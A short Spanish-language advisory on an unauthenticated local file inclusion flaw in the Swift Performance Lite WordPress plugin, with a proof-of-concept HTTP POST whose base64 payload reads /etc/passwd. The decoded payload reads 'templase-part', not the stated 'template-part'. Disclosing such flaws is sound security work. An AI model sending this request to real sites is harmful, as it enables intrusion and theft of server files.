
Swift Performance Lite <= 2.3.7.1 - Inclusión de archivo PHP local no autenticada a través de 'ajaxify'
Swift Performance Lite <= 2.3.7.1 - Inclusión Local de Archivos PHP no Autenticada a través de 'ajaxify'
El plugin Swift Performance Lite para WordPress es vulnerable a la Inclusión Local de Archivos PHP en todas las versiones hasta la 2.3.7.1 incluida, a través de la función 'ajaxify'. Esto hace posible que atacantes no autenticados incluyan y ejecuten archivos arbitrarios en el servidor, permitiendo la ejecución de cualquier código PHP contenido en esos archivos. Esto puede utilizarse para eludir los controles de acceso, obtener datos sensibles o lograr la ejecución de código en los casos en los que puedan subirse e incluirse imágenes y otros tipos de archivos “seguros”.
Payload Base64 = ["template-part","null","../../../../../etc/passwd"]
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 202
action=swift_performance_ajaxify&data=WyJ0ZW1wbGFzZS1wYXJ0IiwibnVsbCIsIi4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QiXQ==